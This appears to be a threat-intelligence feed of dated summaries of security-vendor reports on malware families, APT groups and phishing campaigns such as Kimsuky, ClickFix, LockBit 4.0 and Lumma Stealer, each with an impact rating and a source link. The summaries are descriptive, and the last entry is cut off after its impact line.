Summary:: Picus researchers have provided insights into the North Korean cyber espionage group called Kimsuky also known as Black Banshee which has been active since 2012. This group primarily targets on organisation such as political, economic, and military for intelligence gathering and data theft. Initially the group used to target on organisation in South Korea but over the time they have expanded their activities in the United States, Japan, Russia, and Europe including sectors like education, business services and manufacturing. This group uses employs both open- source and custom malware such as RandomQuery, XRAT and Gold Dragon to infiltrate systems and exfiltrate sensitive data. XRAT allows for keylogging, remote shell access and file management while Gold Dragon is designed for persistence and advanced data exfiltration.

Source: https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-group

Intel Source:: SOC Radar

Intel Name:: ClickFix_Campaign

Date of Scan:: 2025-01-05

Impact:: LOW

Summary:: The ClickFix campaign targets both Windows and macOS by leveraging social engineering tactics. In this campaign, the attackers entice users by sending them fake Google Meet error messages. These messages claim there is a connection issue and urge users to resolve it by downloading files or running commands. When user follow the instructions, they unknowingly install Lumma Stealer and DarkGate malware which collects login credentials, browser history, and cryptocurrency wallet details.

Source: https://socradar.io/clickfix-campaign-fake-google-meet-alerts-malware/

Intel Source:: JPCert

Intel Name:: Recent_Cases_of_Watering_Hole_Attacks

Date of Scan:: 2025-01-04

Impact:: LOW

Summary:: Researchers from JP-Cert have observed two cyber incidents related to Watering hole attacks in Japan. First incident related to a university research laboratory's website which was compromised in 2023 where user encounter fake Adobe Flash Player update request. If user used to download and execute the file then their machine got compromised with the malware. In another incident, the attackers use malware called Tips.exe disguised as a file from Japan’s Ministry of Economy, Trade, and Industry. This malware uses uncommon tricks like running special Windows functions and disable antivirus software.

Source: https://blogs.jpcert.or.jp/en/2024/12/watering_hole_attack_part1.html

Intel Source:: MalwareBytes

Intel Name:: Fake_Game_Sites_Lead_to_Information_Stealers

Date of Scan:: 2025-01-04

Impact:: LOW

Summary:: Researchers at Malwarebytes have discovered an online scam where cybercriminals targets victims through Discord, email, or text messages claiming to be game developers which offers beta testing opportunities for a new video game. Victims receive a download link and a password for a compressed file containing an installer that hosted on platforms like Dropbox, Catbox. However, the installer actually delivers information-stealing malware such as Nova Stealer, Ageo Stealer or Hexon Stealer. These stealers are capable of stealing browser-stored credentials, session cookies, cryptocurrency wallet details, 2FA backup codes and credit card information.

Source: https://www.malwarebytes.com/blog/news/2025/01/can-you-try-a-game-i-made-fake-game-sites-lead-to-information-stealers

Intel Source:: NTT

Intel Name:: OtterCookie_Malware

Date of Scan:: 2025-01-04

Impact:: MEDIUM

Summary:: Researchers from NTT have uncovered a new malware called OtterCookie in the Contagious Interview campaign which is attributed to North Korea. This malware was first observed in September 2024. It communicates with attackers using Socket.IO and can execute remote commands, steal sensitive information and monitor the victim’s system environment. This campaign targets multiple victims and uses various method to distribute malware. The attacks often start by exploiting compromised Node.js projects, npm packages or more recently with Qt or Electron applications. The attackers use loaders to execute OtterCookie malware by downloading JSON data and executing its JavaScript payloads.

Source: https://jp.security.ntt/tech_blog/contagious-interview-ottercookie

Intel Source:: Obsidian

Intel Name:: Butcher_Shop_Phishing_Campaign

Date of Scan:: 2025-01-02

Impact:: LOW

Summary:: Obsidian research team has discovered a phishing campaign called Butcher Shop which targets Microsoft 365 accounts with a focus on legal, government and construction sectors. The attacker uses email redirects and open redirect vulnerabilities and use domains like company.com, which then lead users to malicious sites such as evil.com. This technique exploits legitimate services such as Canva, Google AMP, Dropbox’s Docsend and compromised WordPress sites. In this campaign, 200 domains and 400 unique URLs have been identified. Furthermore, the attackers use tools like Cloudflare Turnstiles to verify the links.

Source: https://obsidiansecurity.com/blog/butcher-shop-phishing-campaign-targets-organizations/

Intel Source:: Trend Micro

Intel Name:: Earth_Koshchei_Rogue_RDP_Campaign

Date of Scan:: 2025-01-02

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have discovered that the APT group Earth Koshchei, which is considered to be supported by the SVR, carried out a large-scale rogue RDP campaign targeting high-profile sectors. The group used spear-phishing emails, red team tools, and advanced anonymization techniques to carry out their attacks. Earth Koshchei's technique included RDP relays, rogue RDP servers, and malicious RDP configuration files, which might result in data loss and malware installation.

Source: https://www.trendmicro.com/en_us/research/24/l/earth-koshchei.html

Intel Source:: Morphisec

Intel Name:: CoinLurker_A_Data_Stealing_Malware

Date of Scan:: 2025-01-02

Impact:: LOW

Summary:: Researchers at Morphisec have uncovered an advanced data stealing malware called CoinLurker which is written in Go language. It has become popular among cybercriminals targeting cryptocurrency wallets, sensitive personal data and financial applications. CoinLurker takes the inspiration from earlier scams like SocGholish, ClearFake, ClickFix and FakeCAPTCHA which trick users through fake software updates, phishing emails and malicious CAPTCHA prompts. However, attackers employ advanced techniques like EtherHiding that uses blockchain technology to hide its malicious payloads and running its code directly in memory to avoid leaving traces on disk. CoinLurker connects to its C2 servers using socket-based communication and specifically steals data from cryptocurrency wallets and financial applications by scanning relevant directories on the victim's device.

Source: https://blog.morphisec.com/coinlurker-the-stealer-powering-the-next-generation-of-fake-updates

Intel Source:: Palo Alto

Intel Name:: HeartCrypt_Boosts_Malware_Campaigns

Date of Scan:: 2025-01-01

Impact:: MEDIUM

Summary:: Researchers at Palo Alto Networks have uncovered HeartCrypt, a new packer-as-a-service (PaaS) that has been in development since July 2023 and deployed in February 2024. HeartCrypt, which is marketed on underground forums and Telegram, charges $20 per file to bundle Windows x86 and.NET payloads, mostly supporting malware families such as LummaStealer, Remcos, and Rhadamanthys. HeartCrypt makes analysis difficult by inserting malicious code within genuine binaries and using complex obfuscation techniques like PIC, multi-layered encoding, and resource-based execution.

Source: https://unit42.paloaltonetworks.com/packer-as-a-service-heartcrypt-malware/

Intel Source:: G-Data

Intel Name:: New_I2PRAT_Communication

Date of Scan:: 2025-01-01

Impact:: LOW

Summary:: G-Data researchers have discovered a malware campaign where attackers use an anonymous network called I2P to hide their identities. The attack begins with a phishing email containing a link to a fake CAPTCHA webpage that tricks the user into copying a malicious PowerShell script and running it by pressing specific key combinations. The script downloads the malware and executes it while distracting the user by opening a pornographic website. The malware first checks if it has admin privileges and if not, it bypasses security to gain admin access. It then loads another malware that connects to the C2 server and send basic system information such as the operating system version and username.

Source: https://www.gdatasoftware.com/blog/2024/12/38093-ip2rat-malware

Intel Source:: Xlabs

Intel Name:: APT41_Targets_Cybercriminals_Via_Glutton_Malware

Date of Scan:: 2025-01-01

Impact:: MEDIUM

Summary:: Researchers from XLab have discovered a new PHP-based backdoor called Glutton targeting industries such as IT services, business operations, and social security in China and the United States. The Glutton malware linked to Chinese state-sponsored group called Winnti also known as APT41. It is malware framework that infects PHP-based systems and targets popular frameworks like Baota, ThinkPHP, Yii and Laravel. It collects sensitive data, injects malicious code, and installs an ELF backdoor that resembles a known Winnti tool called PWNLNX. The backdoor can execute PHP code, transfer files, modify system files and switch communication protocols. Additionally, Glutton targets both organizations and cybercriminals. It compromises enterprise and advertises them on hacker forums to gain access to criminal networks. It also uses tools like HackBrowserData to steal sensitive information from cybercriminals for future phishing or social engineering campaigns.

Source: https://blog.xlab.qianxin.com/glutton_stealthily_targets_mainstream_php_frameworks-en/

Intel Source:: Cybereason

Intel Name:: The_Rise_of_LummaStealer

Date of Scan:: 2024-12-29

Impact:: LOW

Summary:: Researchers from Cybereason have discussed about the infostealer known as Lumma Stealer that first emerged in 2022. The malware primarily targets on Window systems and steal sensitive information such as credentials, cookies, cryptocurrency wallets and other personal data. It is often spread through phishing emails, cracked software and fake downloads from malicious websites. LummaStealer operates as a Malware-as-a-Service (MaaS) that allows various threat actors to subscribe and use the malware for their own malicious activities. It is believed that threat actor from Russia and China have been using this stealer for their malicious activity particularly against logistics and transportation companies in North America.

Source: https://www.cybereason.com/blog/threat-analysis-rise-of-lummastealer

Intel Source:: Zscaler

Intel Name:: NodeLoader_Exposed

Date of Scan:: 2024-12-29

Impact:: MEDIUM

Summary:: Researchers from Zscaler ThreatLabz have discovered a malware campaign called NodeLoader which uses Node.js applications to deliver cryptocurrency miners and information stealers on Windows systems. It also uses a tool called sudo-prompt which is available on github for privilege escalation. The attackers use social engineering tactics on platforms like YouTube and Discord where they upload fake tutorials or game hack videos. These videos include links that redirect users to malicious websites or popular file-sharing services like MediaFire, where they can download ZIP files containing the NodeLoader executable. Once executed, NodeLoader runs a PowerShell script that downloads and installs additional malware such as XMRig, Lumma, and Phemedrone Stealer.

Source: https://www.zscaler.com/blogs/security-research/nodeloader-exposed-node-js-malware-evading-detection

Intel Source:: Trend Micro

Intel Name:: Python_Based_NodeStealer_Targets_Facebook

Date of Scan:: 2024-12-28

Impact:: LOW

Summary:: Researchers at Trend Micro have found a new Python-based variation of the NodeStealer malware that targets Facebook Ads Manager accounts and other sensitive data. This advanced version, discovered during a campaign against a Malaysian educational institution and linked to a Vietnamese threat group, is capable of harvesting credit card information, browser-stored data, and crucial business information.

Source: https://www.trendmicro.com/en_us/research/24/l/python-based-nodestealer.html

Intel Source:: Reliaquest

Intel Name:: Using_CAPTCHA_for_Compromise

Date of Scan:: 2024-12-28

Impact:: MEDIUM

Summary:: Researchers from Reliaquest have observed that Cybercriminals are using fake CAPTCHA pages to trick users into running malicious commands and installing malware on their systems. These pages mimic trusted services like Google or CloudFlare to appear legitimate and lure victims. The attack starts when users visit compromised websites which redirect them to a fake CAPTCHA and silently copy malicious commands to the user’s clipboard using JavaScript. Users are then misled into pasting these malicious commands into the Window Run prompt which installs malware such as infostealers or RATs that harvest sensitive data like login credentials or enable attackers to control the system remotely. These stolen credentials can then be used for data breaches, account hijacking, or financial fraud.

Source: https://www.reliaquest.com/blog/using-captcha-for-compromise/

Intel Source:: Securelist

Intel Name:: Cyber_Anarchy_Squad_Hacktivist_Attacks

Date of Scan:: 2024-12-28

Impact:: LOW

Summary:: Researchers at Securelist have found ongoing attacks by the hacktivist group Cyber Anarchy Squad (C.A.S), which has been targeting Russian and Belarusian companies since 2022. C.A.S focuses on data theft and reputational damage, using flaws in public services and free tools. Their incidents frequently feature ransomware, including leaked LockBit and Babuk builders and unique identifiers such as the number 3119, which represents the group's initials. The gang utilizes Telegram to distribute victim information, stolen data, and promote its beliefs.

Source: https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/

Intel Source:: ThreatBook

Intel Name:: SideWinder_Group_Targeting_Sri_Lanka

Date of Scan:: 2024-12-28

Impact:: LOW

Summary:: Researchers t ThreatBook have identified that SideWinder APT group imitates the official email portal of the Sri Lankan Ministry of Defence for phishing.

Source: https://x.com/ThreatBookLabs/status/1872288256370585931

Intel Source:: Proofpoint

Intel Name:: TA397_Espionage_Tactics_Unveiled

Date of Scan:: 2024-12-27

Impact:: LOW

Summary:: Proofpoint researchers have detected the advanced persistent threat (APT) group TA397, also known as Bitter, targeting a Turkish military sector company with a complex attack chain based on public infrastructure project lures. The attack began with a spear phishing email with a RAR archive that exploited NTFS alternate data streams (ADS) to conceal PowerShell code behind a shortcut (LNK) file posing as a PDF.

Source: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats

Intel Source:: Sonatype

Intel Name:: Npm_Packages_Compromised_to_Distribute_XMRig_Miner

Date of Scan:: 2024-12-27

Impact:: LOW

Summary:: Three popular npm packages @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing attackers to publish malicious versions that installed the XMRig cryptocurrency miner. This attack, identified by Sonatype researchers, targeted multiple versions of the packages on the same day, using the miner to illicitly mine the Monero cryptocurrency on affected systems.

Source: https://www.sonatype.com/blog/npm-packages-rspack-vant-compromised-blocked-by-sonatype

Intel Source:: Datadog Security Labs

Intel Name:: MUT_1244_Targets_Offensive_Actors

Date of Scan:: 2024-12-27

Impact:: LOW

Summary:: Researchers at DATADOG Security Labs have discovered a threat actor known as MUT-1244 who targets offensive actors such as security researchers, pentesters, and malicious threat actors via phishing campaigns and trojanized GitHub repositories. MUT-1244 campaigns include a second-stage payload that exfiltrates sensitive data such as SSH private keys, AWS access keys, and environment variables.

Source: https://securitylabs.datadoghq.com/articles/mut-1244-targeting-offensive-actors/

Intel Source:: Fortinet

Intel Name:: Malicious_Intent_in_Python_Code

Date of Scan:: 2024-12-26

Impact:: LOW

Summary:: Fortinet researchers have identified two malicious Python packages such as Zebo-0.1.0 and Cometlogger-0.1 which disguise themselves as legitimate software while hiding malicious functionalities. Zebo-0.1.0 is a malware that spy on users and steal sensitive information. Its features include capturing keystrokes using keylogging, taking regular screenshots of the victim's desktop and uploading this stolen data to a remote server. On the other hand, Cometlogger-0.1 shows even more advanced malicious behaviours. It dynamically manipulates code at runtime, injecting webhook URLs into Python scripts to send stolen data to remote servers. It collects sensitive user information such as passwords, tokens, session cookies and browsing history from platforms like Discord and Twitter, potentially enabling account hijacking and identity theft.

Source: https://www.fortinet.com/blog/threat-research/analyzing-malicious-intent-in-python-code

Intel Source:: ASEC

Intel Name:: Andariel_Group_Using_SmallTiger_Malware

Date of Scan:: 2024-12-26

Impact:: LOW

Summary:: The Andariel group has been targeting software used by domestic companies, including asset management and data leak prevention (DLP) solutions, for several years. In the second half of 2024, their attacks persisted, focusing on installing SmallTiger malware. Key targets included a widely used domestic asset management solution and a document centralization solution, both of which had been exploited for an extended period.

Source: https://asec.ahnlab.com/ko/85270/

Intel Source:: Cyfirma

Intel Name:: Festive_Season_Cyber_Threats

Date of Scan:: 2024-12-26

Impact:: LOW

Summary:: Researchers from CYFIRMA have discovered that festive events and holidays have become prominent targets for cybercriminals and hacktivists, who take advantage of the increase in online transactions and retail activity during these periods. Threats include automated incidents that take advantage of security flaws, client-side data breaches that target payment information, and advanced bots that engage in fraudulent activities such as price scraping and account compromise.

Source: https://www.cyfirma.com/research/how-festive-events-have-become-prime-targets-for-digital-exploitation-and-fraud/

Intel Source:: Picus

Intel Name:: Exploring_the_Advanced_Tactics_of_APT34__OilRig

Date of Scan:: 2024-12-26

Impact:: MEDIUM

Summary:: OilRig (APT34), also known as Helix Kitten, is a state-sponsored cyber espionage group with a focus on the Middle East. The group has targeted critical sectors like government, energy, telecommunications, and technology services, using advanced tactics to gather intelligence and exert geopolitical influence. Notable incidents include the Helminth Backdoor Campaign (2016), where OilRig used spearphishing and the Helminth backdoor to infiltrate Saudi Arabian organizations, and the QUADAGENT Deployment (2018), where they exploited supply chain vulnerabilities by targeting a technology services provider, deploying a stealthy PowerShell-based backdoor. In 2024, OilRig leveraged the CVE-2024-30088 vulnerability to escalate privileges and deploy the STEALHOOK backdoor, which allowed them to perform data extraction and lateral movement across networks.

Source: https://www.picussecurity.com/resource/blog/oilrig-exposed-tools-techniques-apt34

Intel Source:: Elastic Labs

Intel Name:: Gosar_Malware

Date of Scan:: 2024-12-26

Impact:: LOW

Summary:: Elastic researchers have identified a cyber campaign tracked as REF3864 targeting Chinese-speaking users by impersonating legitimate software like Telegram and Opera browsers. The attackers use SADBRIDGE tool to deploy GOSAR malware, a new version of the QUASAR backdoor to infect Windows, Linux, and Android devices. The attack starts with MSI installer distributed via fake landing pages. When run, it uses DLL side-loading and process injection to deploy malicious payloads called Gosar which can steal sensitive information, hide from antivirus and work on different operating systems.

Source: https://www.elastic.co/security-labs/under-the-sadbridge-with-gosar

Intel Source:: Threatdown

Intel Name:: Evolving_Cryptomining_Threat

Date of Scan:: 2024-12-26

Impact:: LOW

Summary:: Researchers at ThreatDown have discovered that the Sysrv cryptomining botnet is still alive and has developed to aggressively destroy competing malware, ensuring exclusive access to system resources. Sysrv first gained popularity in 2020 for using Golang to construct multi-platform malware that targets both Windows and Linux, and it has since evolved. Recent research of its PowerShell scripts revealed that the botnet uses vulnerabilities to get a foothold, disables Windows Firewall, and kills processes associated with other cryptominers such as XMRig.

Source: https://www.threatdown.com/blog/sysrv-cryptomining-botnet-is-still-alive-and-kicking-out-the-competition/

Intel Source:: Silent Push

Intel Name:: Araneida_Scanner

Date of Scan:: 2024-12-25

Impact:: LOW

Summary:: Silent Push researchers have uncovered a tool called the Araneida Scanner. It seems to be based on a cracked version of Acunetix, a legitimate tool for testing web application security. However, it is being misused for illegal activities, stealing user data and identifying vulnerabilities for exploitation. Araneida is being promoted on platforms like Telegram where it is sold alongside stolen credential. These Telegram channels also provide instructions for malicious use of the tool.

Source: https://www.silentpush.com/blog/araneida-scanner-acunetix/?utm_source=rss&utm_medium=rss&utm_campaign=araneida-scanner-acunetix

Intel Source:: ISC.SANS

Intel Name:: SSH_Reverse_Backdoor_with_SOCKS_Proxy_for_Control

Date of Scan:: 2024-12-25

Impact:: LOW

Summary:: The discovered Windows batch script leverages SSH to create a reverse backdoor on the victim's machine. It adds a registry entry for persistence and uses SSH with options that allow executing local commands, such as downloading and running a malicious executable (`Ghost.exe`). This executable is fetched from a URL hosted on a domain associated with Visual Studio's Dev Tunnels feature, which was repurposed for the attack. The reverse SSH tunnel acts as a SOCKS proxy, enabling the attacker to route traffic through the compromised machine. This method is a sophisticated way to establish remote control, likely via a RAT, while evading detection.

Source: https://isc.sans.edu/diary/More+SSH+Fun/31542/

Intel Source:: Proofpoint

Intel Name:: Threat_Actors_Gift_Holiday_Lures

Date of Scan:: 2024-12-25

Impact:: LOW

Summary:: Proofpoint researchers have observed a surge in phishing and fraud schemes leveraging holiday-themed lures, such as promotions for deals, bonuses, and job offers. A variety of attacks, including credential phishing and malware delivery, have been identified, with attackers impersonating airlines, HR departments, and even reputable nonprofits like Project HOPE. For example, one phishing campaign used fake holiday bonus messages to trick employees into entering their login credentials on counterfeit Microsoft pages.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-gift-holiday-lures-threat-landscape

Intel Source:: CATO Network

Intel Name:: Early_Warning_Signs_of_Ransomware_Double_Extortion

Date of Scan:: 2024-12-25

Impact:: MEDIUM

Summary:: Recent investigations by the Cato CTRL and Cato MDR teams have uncovered a critical early warning sign for double extortion tactics used by ransomware groups, particularly Hunters International and Play. Both groups exhibit unusual internal data-copying activities as an early indicator of exfiltration, which often goes undetected. Hunters International, a new and highly active ransomware group that emerged in late 2023, operates under the Ransomware-as-a-Service (RaaS) model, providing tools and services to other cybercriminals. It is believed to have evolved from the defunct Hive ransomware gang. The Play ransomware gang is known for its sophisticated tactics and rapid evolution. It exploits vulnerabilities in public-facing applications, including FortiOS and Microsoft Exchange, and leverages services like Remote Desktop Protocol (RDP) and VPNs for initial access. Both groups are significant threats to organizations globally.

Source: https://www.catonetworks.com/blog/sophisticated-data-exfiltration-tools-used-in-double-extortion-ransomware-attacks/

Intel Source:: Cyble

Intel Name:: LYNX_Ransomware_Targets_Energy_Sector

Date of Scan:: 2024-12-24

Impact:: LOW

Summary:: Researchers from Cyble have highlighted the growing threat posed by the LYNX ransomware group, encouraging energy sector firms to proactively monitor their IT and key infrastructure for harmful binaries. This followed a ransomware attack on December 9, 2024, that targeted Electrica Group, Romania's largest energy provider.

Source: https://cyble.com/blog/romania-urges-energy-sector-of-proactive-scanning-amid-lynx-ransomware-threat/

Intel Source:: Zscaler

Intel Name:: Technical_Analysis_of_RiseLoader

Date of Scan:: 2024-12-24

Impact:: LOW

Summary:: Zscaler ThreatLabz has discovered a malware called RiseLoader which emerged in October 2024. It acts as a loader that downloads and executes other malicious payloads on victim’s machine. The malware uses a network communication protocol that is similar to another malware called Risepro which has been used for stealing information. RiseLoader focuses on distributing second-stage malware such as Vidar, Lumma Stealer, XMRig and Socks5Systemz. It also collects information about installed applications and browser extensions related to cryptocurrency that has seen in both RisePro and PrivateLoader also.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-riseloader

Intel Source:: Picus

Intel Name:: Exploring_the_Advanced_Tactics_of_APT34_OilRig

Date of Scan:: 2024-12-23

Impact:: LOW

Summary:: OilRig (APT34), also known as Helix Kitten, is a state-sponsored cyber espionage group with a focus on the Middle East. The group has targeted critical sectors like government, energy, telecommunications, and technology services, using advanced tactics to gather intelligence and exert geopolitical influence. Notable incidents include the Helminth Backdoor Campaign (2016), where OilRig used spearphishing and the Helminth backdoor to infiltrate Saudi Arabian organizations, and the QUADAGENT Deployment (2018), where they exploited supply chain vulnerabilities by targeting a technology services provider, deploying a stealthy PowerShell-based backdoor. In 2024, OilRig leveraged the CVE-2024-30088 vulnerability to escalate privileges and deploy the STEALHOOK backdoor, which allowed them to perform data extraction and lateral movement across networks.

Source: https://www.picussecurity.com/resource/blog/oilrig-exposed-tools-techniques-apt34

Intel Source:: TheRavenFile

Intel Name:: LockBit_4_0_Ransomware

Date of Scan:: 2024-12-23

Impact:: HIGH

Summary:: Cybersecurity experts have reported that the LockBit ransomware group has launched LockBit 4.0, signaling a full comeback after a year of law enforcement crackdowns. In related news, the U.S. Department of Justice has charged Rostislav Panev, a 51-year-old Russian-Israeli dual-national, for his alleged involvement in developing LockBit ransomware encryptors and the "StealBit" data-theft tool, as outlined in a criminal complaint unsealed in New Jersey.

Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/LockBit%204.0%20Ransomware

Intel Source:: Trend Micro

Intel Name:: Vishing_Attack_Installs_DarkGate

Date of Scan:: 2024-12-23

Impact:: LOW

Summary:: Researchers at Trend Micro have discovered an attack that used vishing over Microsoft Teams to deliver DarkGate malware. The attacker employed social engineering by impersonating a known client during a Teams session and convincing the victim to download AnyDesk for remote access. Once access was gained, the attacker installed harmful files, including one identified as a Trojan.AutoIt.DARKGATE.D. Using an AutoIt script, the malware ran commands, connected to a command-and-control server, collected system information, and built persistence mechanisms.

Source: https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html

Intel Source:: ISC.SANS

Intel Name:: Christmas_Gift_Delivered_Through_SSH

Date of Scan:: 2024-12-23

Impact:: LOW

Summary:: Researcher from ISC.SANS have observed that the attackers are taking advantage of Christmas season to deliver gifts in your mailboxes in the form of malicious link file dubbed christmas_slab.pdf[.]lnk. When the file is opened, it triggers a process that runs a program called ssh.exe. which connects to a remote server and downloads a malicious executable file to the victim's machine. Once the payload is executed, the attacker passes their own IP address and a username as parameters to the malicious file.

Source: https://isc.sans.edu/diary/Christmas+Gift+Delivered+Through+SSH/31538/

Intel Source:: CloudSEK

Intel Name:: Phishing_Campaign_Targets_Businesses

Date of Scan:: 2024-12-23

Impact:: LOW

Summary:: A sophisticated malware campaign is targeting businesses via email phishing, using trusted brand names and professional collaboration offers as bait. The emails, which often contain malicious attachments disguised as business proposals or promotional materials, are sent from spoofed or compromised addresses. When recipients open the attachments (e.g., Word, PDF, or Excel files), the malware is activated, stealing sensitive data or providing remote access to attackers. The primary targets are individuals in marketing, sales, and executive roles, who are likely to engage in business opportunities.

Source: https://www.cloudsek.com/blog/how-threat-actors-exploit-brand-collaborations-to-target-popular-youtube-channels

Intel Source:: Esentire

Intel Name:: CleverSoar_Campaign

Date of Scan:: 2024-12-22

Impact:: LOW

Summary:: Esentire team has discovered a malware campaign involving a new malware installer called CleverSoar. This malware mainly targets Chinese and Vietnamese-speaking users through malicious installer packages delivered via poisoned search results. These packages install two tools such as the Winos4.0 framework which is used for advanced hacking activities and the Nidhogg rootkit which helps the malware stay hidden and maintain access. In this campaign, Winos4.0 framework referred as Online Module which is built on the Gh0strat malware. It allows attackers to use plugins for spying and control of compromised Windows systems.

Source: https://www.esentire.com/blog/winos4-0-online-module-staging-component-used-in-cleversoar-campaign

Intel Source:: Vasilis Orlof

Intel Name:: Linking_Malicious_Infrastructure_to_Infostealers

Date of Scan:: 2024-12-22

Impact:: LOW

Summary:: A search for specific nginx versions running on port 19000 revealed 17 hosts, with a notable presence of Windows Server 2012, which previously helped identify infrastructure linked to the Rhadamanthys infostealer. This suggests that the infrastructure is likely used by multiple threat actors, primarily serving infostealers and RATs. A refined search returned 29 results, excluding 7 IPs already reported, leaving 22 unique IPs. Of these, 6 were previously reported, reinforcing the hypothesis and linking these IPs to malicious infrastructure with moderate to high confidence. However, the absence of SSH fingerprints limited further associations.

Source: https://intelinsights.substack.com/p/a-multi-actor-infrastructure-investigation

Intel Source:: Hunt.IO

Intel Name:: Recent_Kimsuky_Infrastructure_Trends

Date of Scan:: 2024-12-22

Impact:: LOW

Summary:: Hunt.Io researchers have discovered recent operations tied to the North Korean threat group Kimsuky, which involved websites returning the unique HTTP answer "Million OK!!!!". These domains are similar to the branding of Naver, a South Korean technology business, but have no real relationship. The group's continued use of previously known top-level domains such as p-e.kr, o-r.kr, and n-e.kr suggests that its infrastructure is being actively maintained and expanded. This activity shows Kimsuky's technique of using familiar branding to boost the legitimacy of their destructive activities.

Source: https://hunt.io/blog/million-ok-naver-facade-kimsuky-tracking

Intel Source:: Proofpoint

Intel Name:: Autonomous_System_Spearphishing

Date of Scan:: 2024-12-21

Impact:: LOW

Summary:: In December 2024, a spearphishing campaign targeted over 20 Autonomous System (AS) owners, mostly Internet Service Providers (ISPs), by impersonating the Network Operations Center (NOC) of a major European ISP. The emails, sent to contact addresses in AS WHOIS records, claimed to address BGP flapping issues and were personalized based on the target's Autonomous System Number (ASN). The emails contained a password-protected RAR archive with a malicious Microsoft Shortcut file that triggered an executable to load shellcode and self-delete.

Source: https://x.com/threatinsight/status/1867312362572984579

Intel Source:: Palo Alto

Intel Name:: Using_LLMs_to_Obfuscate_Malicious_JavaScript

Date of Scan:: 2024-12-21

Impact:: LOW

Summary:: Palo Alto researchers have developed a tool that uses large language models to generate new versions of malicious Java code on large scale which help them to improve their detection of such threats. They created a process that uses an LLM repeatedly to rewrite malicious JavaScript while maintaining its original behaviour. They also use the technique like renaming variables, adding unused code, and removing extra spaces, validating each time to ensure the malicious activity stayed intact. This approach significantly reduces the number of security tools like VirusTotal that flag the samples as malicious.

Source: https://unit42.paloaltonetworks.com/using-llms-obfuscate-malicious-javascript/

Intel Source:: Securelist

Intel Name:: BellaCiao_Campaign_Adds_BellaCPP

Date of Scan:: 2024-12-21

Impact:: LOW

Summary:: Researchers at Securelist have noticed the BellaCiao malware family, which is linked to the Charming Kitten APT group, evolve with the development of BellaCPP, a C++ variant of the.NET-based malware. BellaCiao combines the stealth of a webshell with the capacity to create hidden tunnels, and its PDB routes expose target-specific data and versions. BellaCPP, discovered with a.NET BellaCiao sample on a machine in Asia, runs as a Windows service, decrypting strings to load DLLs, resolve functions, and build target-specific domains.

Source: https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/

Intel Source:: Huntress

Intel Name:: Malichus_Malware_via_Cleo_Exploit

Date of Scan:: 2024-12-20

Impact:: MEDIUM

Summary:: Researchers at Huntress have discovered malicious behavior leveraging a 0-day vulnerability in Cleo software, which resulted in the distribution of Malichus, a newly found malware family. This malware, named after Malichus I, who retaliated against Cleopatra by destroying her navy fleet, has been studied, and a comprehensive technical breakdown is provided.

Source: https://www.huntress.com/blog/cleo-software-vulnerability-malware-analysis

Intel Source:: Qualys

Intel Name:: NotLockbit_Ransomware_Group

Date of Scan:: 2024-12-20

Impact:: MEDIUM

Summary:: Researchers at Qualys have discovered new ransomware called NotLockbit that mimics the behaviour and tactics of Lockbit ransomware group. It is written in the Go programming language and targets both macOS and Windows operating systems. The ransomware uses advanced techniques such as encrypting files, stealing data, and deleting itself. NotLockbit has the ability to exfiltrate files to remote storage such as Amazon S3 buckets and enables attackers to employ double-extortion tactics. The ransomware gathers information about the macOS system to better understand the target for maximum impact.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/12/18/notlockbit-a-deep-dive-into-the-new-ransomware-threat

Intel Source:: Elastic Labs

Intel Name:: PUMAKIT_Malware

Date of Scan:: 2024-12-20

Impact:: LOW

Summary:: Elastic researchers have uncovered a complex and advanced malware that design to target Linux systems. It operates in stages including dropper that deploys malware, two temporary files stored in memory, a kernel-level rootkit and a user-level rootkit. The kernel rootkit called PUMA uses advanced techniques to modify the Linux operating system which allows to hide files, directories and itself. The malware uses rmdir (remove directory) command to gain full control of the system and interact with the rootkit. Its main functions such as giving attackers high-level access, hiding malicious activities, communicating with remote servers, and ensuring it stays hidden and operational.

Source: https://www.elastic.co/security-labs/declawing-pumakit

Intel Source:: CIS

Intel Name:: Lynx_Ransomware_Targets_Utilities

Date of Scan:: 2024-12-20

Impact:: MEDIUM

Summary:: Researchers at the Center for Internet Security (CIS) have highlighted the growing threat of the Lynx ransomware group targeting utilities, especially in sectors like energy, oil, and gas. The group has impacted over 20 victims in the U.S. The group was highly active between 2022 and 2024, exploiting vulnerabilities in outdated systems and weak security practices.

Source: https://www.cisecurity.org/insights/blog/lynx-ransomware-pouncing-utilities

Intel Source:: Datadog

Intel Name:: Cybercriminals_Target_AWS_with_Advanced_Techniques

Date of Scan:: 2024-12-20

Impact:: MEDIUM

Summary:: DataDog Researchers have observed that attackers are targeting Amazon Web Services (AWS) account using advanced techniques to maintain long-term access. They leverage their own AWS account to gain access, use VPN service to avoid detection, and set up backdoors by creating fake users and roles with admin rights. They create a fake admin role named SupportAWS and link it to their AWS account. Once inside, they check the Simple Email Service (SES) to see if they can be used it for sending spam or phishing emails. The attackers also use automated tools to gather more information across different AWS regions.

Source: https://securitylabs.datadoghq.com/articles/tales-from-the-cloud-trenches-unwanted-visitor/

Intel Source:: Cyfirma

Intel Name:: BIZFUM_STEALER

Date of Scan:: 2024-12-19

Impact:: LOW

Summary:: Cyfrima Researchers have uncovered a malware called Bizfum Stealer which is available on Github. It primarily targets multiple browsers like Chrome, Firefox, and Edge to steal information such as browser credentials, files, and Discord tokens. Additionally, it also collects clipboard content and can take screenshots of the victim’s desktop that enable attackers to capture visual data about the victim's activities. Bizfum stealer has the capability to encrypt data using RSA encryption and sends all the stolen data to an attacker through Telegram bot.

Source: https://www.cyfirma.com/research/bizfum-stealer/

Intel Source:: Securelist

Intel Name:: Banking_Trojan_Disguised_as_Parcel_App

Date of Scan:: 2024-12-19

Impact:: LOW

